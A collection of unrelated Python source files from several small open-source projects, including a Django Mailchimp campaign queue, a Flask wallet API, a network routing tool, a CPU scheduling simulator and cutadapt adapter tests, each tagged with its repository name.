from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext_lazy as _
from mailchimp.utils import get_connection
class QueueManager(models.Manager):
def queue(self, campaign_type, contents, list_id, template_id, subject,
from_email, from_name, to_email, folder_id=None, tracking_opens=True,
tracking_html_clicks=True, tracking_text_clicks=False, title=None,
authenticate=False, google_analytics=None, auto_footer=False,
auto_tweet=False, segment_options=False, segment_options_all=True,
segment_options_conditions=[], type_opts={}, obj=None, extra_info=[]):
"""
Queue a campaign
"""
kwargs = locals().copy()
kwargs['segment_options_conditions'] = simplejson.dumps(segment_options_conditions)
kwargs['type_opts'] = simplejson.dumps(type_opts)
kwargs['contents'] = simplejson.dumps(contents)
kwargs['extra_info'] = simplejson.dumps(extra_info)
for thing in ('template_id', 'list_id'):
thingy = kwargs[thing]
if hasattr(thingy, 'id'):
kwargs[thing] = thingy.id
del kwargs['self']
del kwargs['obj']
if obj:
kwargs['object_id'] = obj.pk
kwargs['content_type'] = ContentType.objects.get_for_model(obj)
return self.create(**kwargs)
def dequeue(self, limit=None):
if limit:
qs = self.filter(locked=False)[:limit]
else:
qs = self.filter(locked=False)
for obj in qs:
yield obj.send()
def get_or_404(self, *args, **kwargs):
return get_object_or_404(self.model, *args, **kwargs)
class Queue(models.Model):
"""
A FIFO queue for async sending of campaigns
"""
campaign_type = models.CharField(max_length=50)
contents = models.TextField()
list_id = models.CharField(max_length=50)
template_id = models.PositiveIntegerField()
subject = models.CharField(max_length=255)
from_email = models.EmailField()
from_name = models.CharField(max_length=255)
to_email = models.EmailField()
folder_id = models.CharField(max_length=50, null=True, blank=True)
tracking_opens = models.BooleanField(default=True)
tracking_html_clicks = models.BooleanField(default=True)
tracking_text_clicks = models.BooleanField(default=False)
title = models.CharField(max_length=255, null=True, blank=True)
authenticate = models.BooleanField(default=False)
google_analytics = models.CharField(max_length=100, blank=True, null=True)
auto_footer = models.BooleanField(default=False)
generate_text = models.BooleanField(default=False)
auto_tweet = models.BooleanField(default=False)
segment_options = models.BooleanField(default=False)
segment_options_all = models.BooleanField()
segment_options_conditions = models.TextField()
type_opts = models.TextField()
content_type = models.ForeignKey(ContentType, null=True, blank=True)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = generic.GenericForeignKey('content_type', 'object_id')
extra_info = models.TextField(null=True)
locked = models.BooleanField(default=False)
objects = QueueManager()
def send(self):
"""
send (schedule) this queued object
"""
# check lock
if self.locked:
return False
        # acquire lock
self.locked = True
self.save()
# get connection and send the mails
c = get_connection()
tpl = c.get_template_by_id(self.template_id)
content_data = dict([(str(k), v) for k,v in simplejson.loads(self.contents).items()])
built_template = tpl.build(**content_data)
tracking = {'opens': self.tracking_opens,
'html_clicks': self.tracking_html_clicks,
'text_clicks': self.tracking_text_clicks}
if self.google_analytics:
analytics = {'google': self.google_analytics}
else:
analytics = {}
segment_opts = {'match': 'all' if self.segment_options_all else 'any',
'conditions': simplejson.loads(self.segment_options_conditions)}
type_opts = simplejson.loads(self.type_opts)
title = self.title or self.subject
camp = c.create_campaign(self.campaign_type, c.get_list_by_id(self.list_id),
built_template, self.subject, self.from_email, self.from_name,
self.to_email, self.folder_id, tracking, title, self.authenticate,
analytics, self.auto_footer, self.generate_text, self.auto_tweet,
segment_opts, type_opts)
if camp.send_now_async():
self.delete()
kwargs = {}
if self.content_type and self.object_id:
kwargs['content_type'] = self.content_type
kwargs['object_id'] = self.object_id
if self.extra_info:
kwargs['extra_info'] = simplejson.loads(self.extra_info)
return Campaign.objects.create(camp.id, segment_opts, **kwargs)
# release lock if failed
self.locked = False
self.save()
return False
def get_dequeue_url(self):
return reverse('mailchimp_dequeue', kwargs={'id': self.id})
def get_cancel_url(self):
return reverse('mailchimp_cancel', kwargs={'id': self.id})
def get_list(self):
return get_connection().lists[self.list_id]
@property
def object(self):
"""
        The object might have vanished by now, so triple check that it's there!
"""
if self.object_id:
model = self.content_type.model_class()
try:
return model.objects.get(id=self.object_id)
except model.DoesNotExist:
return None
return None
def get_object_admin_url(self):
if not self.object:
return ''
name = 'admin:%s_%s_change' % (self.object._meta.app_label,
self.object._meta.module_name)
return reverse(name, args=(self.object.pk,))
def can_dequeue(self, user):
if user.is_superuser:
return True
if not user.is_staff:
return False
if callable(getattr(self.object, 'mailchimp_can_dequeue', None)):
return self.object.mailchimp_can_dequeue(user)
return user.has_perm('mailchimp.can_send') and user.has_perm('mailchimp.can_dequeue')
class CampaignManager(models.Manager):
def create(self, campaign_id, segment_opts, content_type=None, object_id=None,
extra_info=[]):
con = get_connection()
camp = con.get_campaign_by_id(campaign_id)
extra_info = simplejson.dumps(extra_info)
obj = self.model(content=camp.content, campaign_id=campaign_id,
name=camp.title, content_type=content_type, object_id=object_id,
extra_info=extra_info)
obj.save()
segment_opts = dict([(str(k), v) for k,v in segment_opts.items()])
for email in camp.list.filter_members(segment_opts):
Reciever.objects.create(campaign=obj, email=email)
return obj
def get_or_404(self, *args, **kwargs):
return get_object_or_404(self.model, *args, **kwargs)
class DeletedCampaign(object):
subject = u'<deleted from mailchimp>'
class Campaign(models.Model):
sent_date = models.DateTimeField(auto_now_add=True)
campaign_id = models.CharField(max_length=50)
content = models.TextField()
name = models.CharField(max_length=255)
content_type = models.ForeignKey(ContentType, null=True, blank=True)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = generic.GenericForeignKey('content_type', 'object_id')
extra_info = models.TextField(null=True)
objects = CampaignManager()
class Meta:
ordering = ['-sent_date']
permissions = [('can_view', 'Can view Mailchimp information'),
('can_send', 'Can send Mailchimp newsletters')]
verbose_name = _('Mailchimp Log')
verbose_name_plural = _('Mailchimp Logs')
def get_absolute_url(self):
return reverse('mailchimp_campaign_info', kwargs={'campaign_id': self.campaign_id})
def get_object_admin_url(self):
if not self.object:
return ''
name = 'admin:%s_%s_change' % (self.object._meta.app_label,
self.object._meta.module_name)
return reverse(name, args=(self.object.pk,))
def get_extra_info(self):
if self.extra_info:
return simplejson.loads(self.extra_info)
return []
@property
def object(self):
"""
        The object might have vanished by now, so triple check that it's there!
"""
if self.object_id:
model = self.content_type.model_class()
try:
return model.objects.get(id=self.object_id)
except model.DoesNotExist:
return None
return None
@property
def mc(self):
try:
if not hasattr(self, '_mc'):
self._mc = get_connection().get_campaign_by_id(self.campaign_id)
return self._mc
except:
return DeletedCampaign()
class Reciever(models.Model):
campaign = models.ForeignKey(Campaign, related_name='recievers')
email = models.EmailField()
``` |
{
"source": "johncosta/readthedocs.org",
"score": 2
} |
#### File: readthedocs/restapi/views.py
```python
from django.shortcuts import get_object_or_404
from distlib.version import UnsupportedVersionError
from rest_framework import permissions
from rest_framework import viewsets
from rest_framework.decorators import link
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from betterversion.better import version_windows, BetterVersion
from projects.models import Project, EmailHook
from .serializers import ProjectSerializer
from .permissions import RelatedProjectIsOwner
class ProjectViewSet(viewsets.ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
renderer_classes = (JSONRenderer, BrowsableAPIRenderer)
model = Project
@link()
def valid_versions(self, request, **kwargs):
"""
Maintain state of versions that are wanted.
"""
project = get_object_or_404(Project, pk=kwargs['pk'])
if not project.num_major or not project.num_minor or not project.num_point:
return Response({'error': 'Project does not support point version control.'})
versions = []
for ver in project.versions.all():
try:
versions.append(BetterVersion(ver.verbose_name))
except UnsupportedVersionError:
# Probably a branch
pass
active_versions = version_windows(
versions,
major=project.num_major,
minor=project.num_minor,
point=project.num_point,
flat=True,
)
version_strings = [v._string for v in active_versions]
# Disable making old versions inactive for now.
#project.versions.exclude(verbose_name__in=version_strings).update(active=False)
project.versions.filter(verbose_name__in=version_strings).update(active=True)
return Response({
'flat': version_strings,
})
@link()
def translations(self, request, **kwargs):
project = get_object_or_404(Project, pk=kwargs['pk'])
queryset = project.translations.all()
return Response({
'translations': ProjectSerializer(queryset, many=True).data
})
class NotificationViewSet(viewsets.ModelViewSet):
permission_classes = (permissions.IsAuthenticated, RelatedProjectIsOwner)
renderer_classes = (JSONRenderer, BrowsableAPIRenderer)
model = EmailHook
def get_queryset(self):
"""
        This view should return a list of all the notification hooks
        for projects owned by the currently authenticated user.
"""
user = self.request.user
if user.is_superuser:
return self.model.objects.all()
return self.model.objects.filter(project__users__in=[user.pk])
``` |
{
"source": "JohnCrash/scrollshade",
"score": 2
} |
#### File: scrollshade/pythongreen/www.py
```python
import zmq
import json
from flask import Flask,escape,request,url_for,redirect,abort
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:5555")
app = Flask(__name__)
def sendCommand(obj):
socket.send(json.dumps(obj))
return socket.recv()
@app.route('/')
def index():
return redirect('/static/index.html')
#Get the current temperature and the state of the fan and accelerator
@app.route('/state')
def state():
s = sendCommand({'cmd':'state'})
return s
#强制打开风扇和加速器一定时间
@app.route('/force/<device>')
def set(device):
s = sendCommand({'cmd':'set','arg':[device]})
print(s)
return s
``` |
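The Flask routes above only cover the REQ side of the ZeroMQ pair; a purely hypothetical sketch of what the matching REP worker on port 5555 could look like (the command names follow the `state` and `set` strings used above, everything else is illustrative):
```python
import zmq

context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")

while True:
    msg = socket.recv_json()    # e.g. {"cmd": "state"} or {"cmd": "set", "arg": ["fan"]}
    if msg.get("cmd") == "state":
        socket.send_json({"temperature": 25.0, "fan": False, "accelerator": False})
    elif msg.get("cmd") == "set":
        socket.send_json({"ok": True, "device": msg.get("arg")})
    else:
        socket.send_json({"error": "unknown command"})
```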
{
"source": "JohnCrash/SDLnanovg",
"score": 3
} |
#### File: build/android/adbsyn.py
```python
import os
import json
def push(local,remote):
return os.system('adb push '+local+' '+remote)
def pull(local,remote):
return os.system('adb pull '+remote+' '+local)
def restart(intent):
return os.system('adb shell am start -S '+intent)
def fordir(proot,dir,func,param1,param2):
fmd = 0
if os.path.isdir(proot) == False:
print "[",proot,"] is not a dirpath"
else:
plist = os.listdir(proot+"/"+dir)
for d in plist:
child = proot+"/"+dir+"/"+d
if True == os.path.isdir(child):
fmd = max(fmd,fordir(proot,dir+"/"+d,func,param1,param2))
else:
fmd = max(fmd,func(proot,dir+"/"+d,param1,param2))
return fmd
def push_func(root,file,remote,prevdate):
try:
fmd = os.path.getmtime(root+file)
# print "getmtime : "+root+file+":"+str(fmd)
except OSError as e:
return 0
if fmd > prevdate :
push(root+file,remote+file)
return fmd
else:
return 0
def push_directory(local,remote,prevdate):
return fordir(local,"",push_func,remote,prevdate)
cwd = os.path.dirname(os.path.realpath(__file__))
update_file = cwd+"/.adbsyn"
def get_prev_update_time():
try:
update_date_file = open(update_file,"rb")
update_date = json.loads(update_date_file.read())
update = update_date["update"]
update_date_file.close()
return update
except IOError:
print "Can't read file " + update_file
return 0
def set_prev_update_time(t):
try:
if t > 0 :
update_date_file = open(update_file,'wb')
update_date_file.write(json.dumps({"update":t}))
update_date_file.close()
except IOError:
print "Can't write file " + update_file
if __name__ == "__main__":
set_prev_update_time( push_directory(cwd+"/assets/lua","/sdcard/SDLnanovg/lua",get_prev_update_time()) )
restart("org.libsdl.nanovg/.nanovgActivity")
os.system("adb logcat -s SDL SDL/APP nanovg")
``` |
{
"source": "JohnCrickett/CommandoMaths",
"score": 3
} |
#### File: CommandoMaths/commandomaths/screen.py
```python
import pygame
def init_screen():
# TODO get screen size and size window based on it
# display_info = pygame.display.Info()
# print(display_info)
size = 1280, 800
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Commando Maths")
return screen
``` |
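A minimal sketch of calling `init_screen`, assuming pygame is initialised by the caller as in a typical game entry point:
```python
import pygame
from commandomaths.screen import init_screen

pygame.init()
screen = init_screen()
screen.fill((0, 0, 0))     # clear to black
pygame.display.flip()
```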
{
"source": "JohnCrickett/HC",
"score": 3
} |
#### File: JohnCrickett/HC/router.py
```python
import argparse
from router.router import RouteCalculator, JourneyError
from router.network import Network, load_network
def main():
parser = argparse.ArgumentParser(description='Routing.')
parser.add_argument('--network',
help='the name of the network file to route over',
required=True
)
parser.add_argument('--journeytime',
nargs="+",
help='the journey to validate / cost',
)
parser.add_argument('--shortesttime',
nargs="+",
help='the journey to calculate / cost',
)
parser.add_argument('--hoplimit',
nargs="+",
help='the journey hop limit',
)
parser.add_argument('--timelimit',
nargs="+",
help='the journey time limit',
)
args = parser.parse_args()
    # the network argument is required, so we can assume we have a filename here
    # and try to load it
    network = load_network(args.network)
    # now let's see what the user wants to do with the network
    # determine a journey time for a specified route
    if args.journeytime is not None:
try:
rc = RouteCalculator(network)
time = rc.calculate_journey_time(args.journeytime)
print("Journey time is: %d" % time)
except JourneyError as e:
print(e)
# calculate the shortest route for a specified src/dest pair
    if args.shortesttime is not None:
try:
rc = RouteCalculator(network)
route = rc.calculate_shortest_path(args.shortesttime[0], args.shortesttime[1])
time = rc.calculate_journey_time(route)
print("Journey time is: %d" % time)
print("Route is: " + ', '.join(route))
except JourneyError as e:
print(e)
# get all routes from src to dest that are within hoplimit
    if args.hoplimit is not None:
rc = RouteCalculator(network)
# TODO
# get all routes from src to dest that are within limit
    if args.timelimit is not None:
rc = RouteCalculator(network)
# TODO
if __name__ == '__main__':
main()
```
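A minimal programmatic sketch of the same flow the CLI above wires up, assuming the sample `./data/network.txt` file used by the tests:
```python
from router.network import load_network
from router.router import RouteCalculator

network = load_network('./data/network.txt')
rc = RouteCalculator(network)

route = rc.calculate_shortest_path("Buenos Aires", "New York")
print("Route is: " + ', '.join(route))
print("Journey time is: %d" % rc.calculate_journey_time(route))
```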
#### File: HC/test/test_network.py
```python
import unittest
import env
from router.network import load_network, Network, NetworkError
class TestNetwork(unittest.TestCase):
def setUp(self):
pass
def test_load(self):
network = load_network('./data/network.txt') # TODO mock this
self.assertEqual(network.size(), 9)
reachable_from_Buenos_Aires = network.reachable_from("Buenos Aires")
self.assertCountEqual(reachable_from_Buenos_Aires,
["Cape Town", "Casablanca", "New York"])
def test_add_link(self):
network = Network()
network.add_link("A", "B", 5)
network.add_link("C", "B", 6)
network.add_link("A", "C", 5)
reachable_from_A = network.reachable_from("A")
self.assertEqual(len(reachable_from_A), 2)
self.assertCountEqual(reachable_from_A, ["B", "C"])
def test_add_circular_link(self):
network = Network()
with self.assertRaises(NetworkError):
network.add_link("B", "B", 5)
def test_add_nonnumeric_link(self):
network = Network()
with self.assertRaises(ValueError):
network.add_link("B", "C", 'c')
def test_cost(self):
network = Network()
network.add_link("A", "B", 5)
self.assertEqual(network.link_cost("A", "B"), 5)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JohnCrickett/OLEx",
"score": 2
} |
#### File: JohnCrickett/OLEx/app.py
```python
from collections import defaultdict
#import MySQLdb # this is not available on windows for anaconda and python 3.4
from bs4 import BeautifulSoup
import operator
import os
from tornado.httpclient import AsyncHTTPClient
import tornado.ioloop
import tornado.web
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("templates/form.html", title="OLEx App")
@tornado.web.asynchronous
def post(self):
self.write("Your URL is: " + self.get_argument('url', ''))
http_client = AsyncHTTPClient()
http_client.fetch(self.get_argument('url', ''),
callback=self.on_fetch)
def on_fetch(self, response):
if response.error:
print("Error:", response.error)
self.render("templates/error.html", title="OLEx App", message = response.error)
else:
soup = BeautifulSoup(response.body)
for script in soup(["script", "style"]):
script.extract()
wordmap = self.generate_wordmap(soup.get_text())
top100 = sorted(wordmap.items(), key=operator.itemgetter(1), reverse=True)[:100]
self.render("templates/result.html", title="OLEx App", content = top100)
def generate_wordmap(self, text):
words = text.split()
counts = defaultdict(int)
for word in words:
counts[word] += 1
return counts
def make_app():
settings = {'debug': True,
'static_path': os.path.join(os.path.dirname(__file__), "static")
}
return tornado.web.Application([
(r"/", MainHandler),
], **settings)
if __name__ == "__main__":
app = make_app()
app.listen(options.port)
tornado.ioloop.IOLoop.current().start()
``` |
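As an aside, the `generate_wordmap` plus `sorted(...)[:100]` pair above is equivalent to `collections.Counter.most_common`; a tiny standalone sketch:
```python
from collections import Counter

text = "the quick brown fox jumps over the lazy dog the end"
top100 = Counter(text.split()).most_common(100)
print(top100)   # [('the', 3), ('quick', 1), ...]
```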
{
"source": "JohnCrickett/WalletAPI",
"score": 3
} |
#### File: WalletAPI/wallet_api/api.py
```python
from typing import Optional, Tuple
from flask import Blueprint, current_app, g, jsonify, Response, request
from flask_httpauth import HTTPBasicAuth
import sqlite3
from werkzeug.security import check_password_hash
from wallet_api.db import get_db
auth = HTTPBasicAuth()
bp = Blueprint(
"wallet", __name__, url_prefix="/wallet", static_folder="static"
)
@auth.verify_password
def verify_password(username: str, password: str) -> bool:
"""
Verify the provided user credentials.
Args:
username -- the username of the user to be verified.
password -- their password.
Returns:
True/False for the validity of the credentials
"""
db = get_db()
sql = "SELECT id, password FROM users WHERE username = ?"
result = db.execute(sql, (username,)).fetchone()
if result is not None:
g.user = result["id"]
if check_password_hash(result["password"], password):
return True
current_app.logger.debug(f"Unauthorised access attempt by {username}")
return False
@bp.route("/transfer", methods=["POST"])
@auth.login_required
def transfer() -> Tuple[dict, Optional[int]]:
"""
Handle requests to transfer funds, expects to receive JSON data
containing the receiver's username and the amount, i.e.:
{
"receiver": "john",
"amount": 100
}
The sender is the currently authenticated user.
"""
    if not {"amount", "receiver"} <= request.json.keys():
return (
jsonify(
error="Invalid request, please provide both receiver and amount"
),
400,
)
receiver_username = request.json["receiver"]
amount = request.json["amount"]
if not type(amount) is int:
return (
jsonify(
error="Invalid amount provided, please ensure the correct type is used."
),
400,
)
if amount <= 0:
return (
jsonify(error="Transfer amount must be greater than zero."),
403,
)
db = get_db()
sql = "SELECT id FROM users WHERE username = ?"
result = db.execute(sql, (receiver_username,)).fetchone()
if result is not None:
receiver_id = result["id"]
# only commit or rollback all updates and ensure the sender has
        # sufficient balance before proceeding.
db.isolation_level = None
c = db.cursor()
c.execute("begin")
try:
sql = "SELECT balance FROM users WHERE id = ?"
result = c.execute(sql, (g.user,)).fetchone()
if int(result["balance"]) < amount:
raise ValueError("Insufficient funds for transfer")
c.execute(
"UPDATE users SET balance = balance + ? WHERE id = ?",
(amount, receiver_id),
)
c.execute(
"UPDATE users SET balance = balance - ? WHERE id = ?",
(amount, g.user),
)
c.execute(
"INSERT INTO transactions (sender_id, receiver_id, value) "
"VALUES (?,?,?);",
(g.user, receiver_id, amount),
)
c.execute("commit")
except sqlite3.Error as e:
current_app.logger.error(f"Transaction failed: {e}")
c.execute("rollback")
return jsonify(error="Unable to complete transaction"), 500
        except ValueError:
            c.execute("rollback")
            return jsonify(error="Insufficient funds for transfer"), 403
return jsonify(success="True")
return jsonify(error="Invalid User Provided"), 400
@bp.route("/balance", methods=["GET"])
@auth.login_required
def balance() -> Response:
"""
    Handle balance requests for the currently authenticated user.
"""
db = get_db()
sql = "SELECT balance FROM users WHERE id = ?"
result = db.execute(sql, (g.user,)).fetchone()
return jsonify({"balance": result["balance"]})
@bp.route("/transactions", methods=["GET"])
@auth.login_required
def transactions() -> Response:
"""
Handle transaction requests for the currently authenticated user.
"""
db = get_db()
sql = (
"SELECT "
"transaction_timestamp, "
"value, "
"s.username as sender, "
"r.username as receiver "
"FROM transactions "
"LEFT JOIN users s on s.id = transactions.sender_id "
"LEFT JOIN users r on r.id = transactions.receiver_id "
"WHERE sender_id = ? OR receiver_id = ?"
)
result = db.execute(sql, (g.user, g.user)).fetchall()
transactions = {
"transactions": [
{
"sender": row["sender"],
"receiver": row["receiver"],
"date": row["transaction_timestamp"],
"amount": row["value"],
}
for row in result
]
}
return jsonify(transactions)
@bp.route("/documentation", methods=["GET"])
def documentation() -> Response:
"""
Send the OpenAPI documentation to the client.
"""
return bp.send_static_file("openapispec.html")
```
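A hypothetical client-side sketch of the endpoints above using `requests`; the host, port, usernames and passwords are made up, and authentication is HTTP Basic as wired up by `verify_password`:
```python
import requests

BASE = "http://localhost:5000/wallet"    # assumes the Flask dev server defaults
auth = ("alice", "alice-password")       # hypothetical user credentials

print(requests.get(f"{BASE}/balance", auth=auth).json())

resp = requests.post(
    f"{BASE}/transfer",
    json={"receiver": "bob", "amount": 100},   # matches the JSON shape expected by transfer()
    auth=auth,
)
print(resp.status_code, resp.json())

print(requests.get(f"{BASE}/transactions", auth=auth).json())
```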
#### File: WalletAPI/wallet_api/__init__.py
```python
from os import makedirs
from os.path import join
from typing import Union
from flask import Flask
from wallet_api.db import init_app
from wallet_api.api import bp
def create_app(test_config: Union[dict, None] = None) -> Flask:
"""Create the Flask application"""
app = Flask(__name__, instance_relative_config=True)
database_path = join(app.instance_path, "wallet.sqlite")
app.config.from_mapping(DATABASE=database_path)
if test_config is None:
app.config.from_pyfile("config.py", silent=True)
else:
app.config.from_mapping(test_config)
# ensure the instance folder exists
makedirs(app.instance_path, exist_ok=True)
init_app(app)
app.register_blueprint(bp)
app.logger.info("Wallet API Server Started Up")
return app
``` |
{
"source": "JohnCrickett/WebScraper",
"score": 3
} |
#### File: WebScraper/test/echo_server.py
```python
from flask import Flask
from flask import request
app = Flask(__name__)
@app.route('/', methods=['GET'])
def echo():
return "This is my Flask Test Server"
if __name__ == '__main__':
app.run(port=8000)
``` |
{
"source": "johncs00/CPU-Scheduling-Sim",
"score": 4
} |
#### File: johncs00/CPU-Scheduling-Sim/cpusim.py
```python
import sys
import time
import random as rand
import math
def burstnumber(input):
input = input * 100
input = math.trunc(input)
input += 1
return input
print("Testing")
r = rand.random()
print(r)
bursttest = 0.0856756876765
bursttest = burstnumber(bursttest)
print(bursttest, "This should be 9")
min = 0
max = 0
sum = 0
#replace l with argv[3]
#replace upperbound with argv[4]
iterations = 10000000
l = 0.001
upperbound = 3000
i = 0
while i < iterations:
    # replace random() with drand48 when porting back to C
    r = rand.random()  # uniform dist [0.00, 1.00) -- also check out random()
    x = -math.log(r) / l  # l is lambda; log() is the natural log
    # avoid values that are far down the "long tail" of the distribution by resampling
    if x > upperbound:
        continue
    if i < 20:
        print("x is ", x)
    sum += x
    if i == 0 or x < min:
        min = x
    if i == 0 or x > max:
        max = x
    i += 1
avg = sum / iterations
print( "minimum value: ", min)
print( "maximum value: ", max)
print( "average value: ", avg)
```
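The `-math.log(r) / l` expression above is the standard inverse-transform sampler for an exponential distribution: if F(x) = 1 - exp(-lambda * x) then F^-1(u) = -ln(1 - u) / lambda, and since 1 - u is uniform whenever u is, -ln(r) / lambda works directly. A tiny self-contained check of the expected mean 1 / lambda:
```python
import math
import random

lam = 0.001
samples = [-math.log(random.random()) / lam for _ in range(100000)]
print(sum(samples) / len(samples))   # should be close to 1 / lam = 1000
```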
#### File: johncs00/CPU-Scheduling-Sim/process.py
```python
class Process:
def __init__(self, name, cpu_time, io_time, state, turn_time, wait_time):
self.n = name
self.cpu = cpu_time
self.io = io_time
self.s = state
self.turn = turn_time
self.wait = wait_time
    def getName(self):
        return self.n
    def setName(self, name):
        self.n = name
    def getCpu(self):
        return self.cpu
    def setCpu(self, cpu_time):
        self.cpu = cpu_time
    def getIo(self):
        return self.io
    def setIo(self, io_time):
        self.io = io_time
    def getState(self):
        return self.s
    def setState(self, state):
        self.s = state
``` |
{
"source": "JohnCSW/simple-rest-api",
"score": 2
} |
#### File: simple-rest-api/common/entity_serializer.py
```python
from flask import jsonify
def serialize_entity(func):
def inner():
return jsonify(func())
return inner
```
#### File: simple-rest-api/repo/base_repo.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, Query
from entity.customer import Customer
engine = create_engine(
'mysql+pymysql://root:for-root-test-only@localhost:3306/classicmodels'
)
Session = sessionmaker(bind=engine)
class BaseRepo:
def __init__(self):
self.session = Session()
def find_all(self, query):
return query.with_session(self.session).all()
```
#### File: repo/query/customer_query_builder.py
```python
from .base_query_bulder import BaseQueryBuilder
from entity.customer import Customer
class CustomerQueryBuilder(BaseQueryBuilder):
def __init__(self):
super().__init__([Customer])
def first_name(self, first_name):
if first_name:
self.query = self.query.filter(
Customer.contactFirstName == first_name
)
return self
def last_name(self, last_name):
if last_name:
self.query = self.query.filter(
Customer.contactLastName == last_name
)
return self
def order_by_credit_limit(self, enabled):
if enabled:
self.query = self.query.order_by(Customer.creditLimit)
return self
```
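A hypothetical sketch of how the builder above could be combined with `BaseRepo`; this assumes `BaseQueryBuilder` simply keeps the growing SQLAlchemy `Query` on `self.query` (as the subclasses suggest) and that the MySQL instance configured in `base_repo` is reachable:
```python
from repo.base_repo import BaseRepo
from repo.query.customer_query_builder import CustomerQueryBuilder

repo = BaseRepo()
builder = (
    CustomerQueryBuilder()
    .last_name("King")              # made-up filter value
    .order_by_credit_limit(True)
)
for customer in repo.find_all(builder.query):
    print(customer.contactFirstName, customer.contactLastName, customer.creditLimit)
```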
#### File: repo/query/order_query_bulder.py
```python
from entity.customer import Customer
from entity.order import Order
from repo.query.base_query_bulder import BaseQueryBuilder
class OrderQueryBuilder(BaseQueryBuilder):
def __init__(self):
super().__init__([Order])
self.query = self.query.join(Customer)
def cust_first_name(self, first_name):
if first_name:
self.query = self.query.filter(
Customer.contactFirstName == first_name
)
return self
def cust_last_name(self, last_name):
if last_name:
self.query = self.query.filter(
Customer.contactLastName == last_name
)
return self
def order_by_date(self, enabled):
if enabled:
self.query = self.query.order_by(Order.orderDate)
return self
def order_by_cust_last_name(self, enabled):
if enabled:
self.query = self.query.order_by(Customer.contactLastName)
return self
``` |
{
"source": "johncthomas/keepadapt",
"score": 2
} |
#### File: keepadapt/tests/testadapters.py
```python
from __future__ import print_function, division, absolute_import
from nose.tools import raises, assert_raises
from cutadapt.seqio import Sequence
from cutadapt.adapters import (Adapter, Match, ColorspaceAdapter, FRONT, BACK,
parse_braces, LinkedAdapter)
def test_issue_52():
adapter = Adapter(
sequence='GAACTCCAGTCACNNNNN',
where=BACK,
max_error_rate=0.12,
min_overlap=5,
read_wildcards=False,
adapter_wildcards=True)
read = Sequence(name="abc", sequence='CCCCAGAACTACAGTCCCGGC')
am = Match(astart=0, astop=17, rstart=5, rstop=21, matches=15, errors=2,
remove_before=False, adapter=adapter, read=read)
assert am.wildcards() == 'GGC'
"""
The result above should actually be 'CGGC' since the correct
alignment is this one:
adapter GAACTCCAGTCACNNNNN
mismatches X X
read CCCCAGAACTACAGTC-CCGGC
Since we do not keep the alignment, guessing 'GGC' is the best we
can currently do.
"""
def test_issue_80():
# This issue turned out to not be an actual issue with the alignment
# algorithm. The following alignment is found because it has more matches
# than the 'obvious' one:
#
# TCGTATGCCGTCTTC
# =========X==XX=
# TCGTATGCCCTC--C
#
# This is correct, albeit a little surprising, since an alignment without
# indels would have only two errors.
adapter = Adapter(
sequence="TCGTATGCCGTCTTC",
where=BACK,
max_error_rate=0.2,
min_overlap=3,
read_wildcards=False,
adapter_wildcards=False)
read = Sequence(name="seq2", sequence="TCGTATGCCCTCC")
result = adapter.match_to(read)
assert result.errors == 3, result
assert result.astart == 0, result
assert result.astop == 15, result
def test_str():
a = Adapter('ACGT', where=BACK, max_error_rate=0.1)
str(a)
str(a.match_to(Sequence(name='seq', sequence='TTACGT')))
ca = ColorspaceAdapter('0123', where=BACK, max_error_rate=0.1)
str(ca)
@raises(ValueError)
def test_color():
ColorspaceAdapter('0123', where=FRONT, max_error_rate=0.1)
def test_parse_braces():
assert parse_braces('') == ''
assert parse_braces('A') == 'A'
assert parse_braces('A{0}') == ''
assert parse_braces('A{1}') == 'A'
assert parse_braces('A{2}') == 'AA'
assert parse_braces('A{2}C') == 'AAC'
assert parse_braces('ACGTN{3}TGACCC') == 'ACGTNNNTGACCC'
assert parse_braces('ACGTN{10}TGACCC') == 'ACGTNNNNNNNNNNTGACCC'
assert parse_braces('ACGTN{3}TGA{4}CCC') == 'ACGTNNNTGAAAACCC'
assert parse_braces('ACGTN{0}TGA{4}CCC') == 'ACGTTGAAAACCC'
def test_parse_braces_fail():
for expression in ['{', '}', '{}', '{5', '{1}', 'A{-7}', 'A{', 'A{1', 'N{7', 'AN{7', 'A{4{}',
'A{4}{3}', 'A{b}', 'A{6X}', 'A{X6}']:
assert_raises(ValueError, lambda: parse_braces(expression))
def test_linked_adapter():
linked_adapter = LinkedAdapter('AAAA', 'TTTT', min_overlap=4)
assert linked_adapter.front_adapter.min_overlap == 4
assert linked_adapter.back_adapter.min_overlap == 4
sequence = Sequence(name='seq', sequence='AAAACCCCCTTTT')
trimmed = linked_adapter.match_to(sequence).trimmed()
assert trimmed.name == 'seq'
assert trimmed.sequence == 'CCCCC'
def test_info_record():
adapter = Adapter(
sequence='GAACTCCAGTCACNNNNN',
where=BACK,
max_error_rate=0.12,
min_overlap=5,
read_wildcards=False,
adapter_wildcards=True,
name="Foo")
read = Sequence(name="abc", sequence='CCCCAGAACTACAGTCCCGGC')
am = Match(astart=0, astop=17, rstart=5, rstop=21, matches=15, errors=2, remove_before=False,
adapter=adapter, read=read)
assert am.get_info_record() == (
"abc",
2,
5,
21,
'CCCCA',
'GAACTACAGTCCCGGC',
'',
'Foo',
'',
'',
''
)
def test_random_match_probabilities():
a = Adapter('A', where=BACK, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25]
assert a.random_match_probabilities(0.2) == [1, 0.4]
for s in ('ACTG', 'XMWH'):
a = Adapter(s, where=BACK, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25, 0.25**2, 0.25**3, 0.25**4]
assert a.random_match_probabilities(0.2) == [1, 0.4, 0.4*0.1, 0.4*0.1*0.4, 0.4*0.1*0.4*0.1]
a = Adapter('GTCA', where=FRONT, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25, 0.25**2, 0.25**3, 0.25**4]
